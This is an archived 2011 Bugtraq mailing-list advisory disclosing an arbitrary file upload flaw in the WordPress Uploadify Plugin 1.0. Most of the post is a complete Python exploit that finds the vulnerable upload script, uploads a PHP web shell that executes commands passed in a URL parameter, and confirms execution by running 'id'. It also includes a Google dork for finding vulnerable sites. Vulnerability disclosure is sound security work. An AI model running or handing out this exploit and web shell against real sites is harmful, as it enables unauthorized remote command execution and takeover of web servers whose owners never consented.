lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <AANLkTi=bafaDOrSa8wBXpokH3mRc4SGaEFM4KZ1a4j=q@mail.gmail.com>
Date: Wed, 23 Feb 2011 19:34:17 -0300
From: Leonardo Rota Botelho <me@...nardobotelho.com>
To: bugtraq@...urityfocus.com
Subject: WordPress Uploadify Plugin 1.0 Remote File Upload

GotGeek Labs
http://www.gotgeek.com.br/

WordPress Uploadify Plugin 1.0 Remote File Upload



[+] Description

Adds a shortcode to embed the necessary elements to use
Uploadify in a page or post which will give your website
visitors the ability to upload large files. By default the
files will be uploaded to the folder set in your preferences.
The shortcode supports most of the Uploadify options, so it
can be easily customized to suit your needs.



[+] Information

Title: WordPress Uploadify Plugin 1.0 Remote File Upload
Google Dork: inurl:"/wp-content/plugins/uploadify/"
Advisory: gg-003-2011
Date: 02-18-2011
Last update: 02-21-2011
Link: http://www.gotgeek.com.br/pocs/gg-003-2011.txt
Tested on: CentOS 5.5 + WordPress 3.0.5



[+] Vulnerability

Uploadify Plugin is prone to a vulnerability that lets
attackers upload arbitrary files. Successful exploitation
of the vulnerability allows an attacker to upload a php code
for example and run it in the context of the webserver
process. This may facilitate unauthorized access or privilege
escalation.

Affected Versions:
WordPress Uploadify Plugin 1.0



[+] Proof of Concept/Exploit

#!/usr/bin/python
#

import httplib
import socket
import sys, time


plugin = "/wp-content/plugins/uploadify/includes/"
shell = """
<?php system($_GET['cmd']); ?>
"""


def banner():
    print "\n[*] gotgeek labs"
    print "[*] http://gotgeek.com.br\n"

if len(sys.argv) < 4:
    banner()
    print "[?] Usage: " + sys.argv[0] + " <target> <dir> <port>"
    print "[?] Example: uploadify.py www.example.com /wordpress 80\n\n"
    sys.exit(1)

target = sys.argv[1]
dir = sys.argv[2]
port = sys.argv[3]


def checkurl():
    try:
        print "[*] Looking for vulnerable file..."
        conn = httplib.HTTPConnection(target+":"+port)
        conn.request("GET", dir + plugin + "process_upload.php")
        r1 = conn.getresponse()
        if r1.status == 200:
            print "[+] Found!\n"
        else:
            print "[-] NOT Found!\n\n"
            sys.exit(1)
    except socket.error, msg:
        print "[-] Can't connect!\n\n"
        sys.exit(1)


def uploadshell():
    print "[*] Uploading shell..."
    params = ("\r\n"
              "------gg\r\n"
              'Content-Disposition: form-data; name="Filedata";
filename="shell.php"\r\n'
              "Content-Type: application/octet-stream\r\n"
              "\r\n")
    params+=  shell + "\r\n"
    params+= ("------gg--\r\n"
              "\r\n")
    headers = {'User-Agent': 'gotgeek',
               'Content-Type': 'multipart/form-data; boundary=----gg'}
    conn = httplib.HTTPConnection(target+":"+port)
    conn.request("POST", dir + plugin +
"process_upload.php?folder=./", params, headers)
    time.sleep(3)


def checkshell():
    print "[*] Checking shell.php..."
    conn = httplib.HTTPConnection(target+":"+port)
    conn.request("GET", dir + plugin + "shell.php")
    r2 = conn.getresponse()
    if r2.status == 200:
        print "[+] Shell Uploaded!\n"
        conn.request("GET", dir + plugin + "shell.php?cmd=id")
        r3 = conn.getresponse()
        id = r3.read()
        print "[+] id: " + id
        print "[+] shell: http://" + target + dir + plugin +
"shell.php?cmd=[command]\n\n"
        conn.close()
    else:
        print "[-] NOT Uploaded!\n\n"
        sys.exit(1)



def main():
    banner()
    checkurl()
    uploadshell()
    checkshell()

if __name__ == "__main__":
    main()



[+] References

http://wordpress.org/extend/plugins/uploadify/
http://wordpress.org/extend/plugins/uploadify/stats/



[+] Credits

b0telh0

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ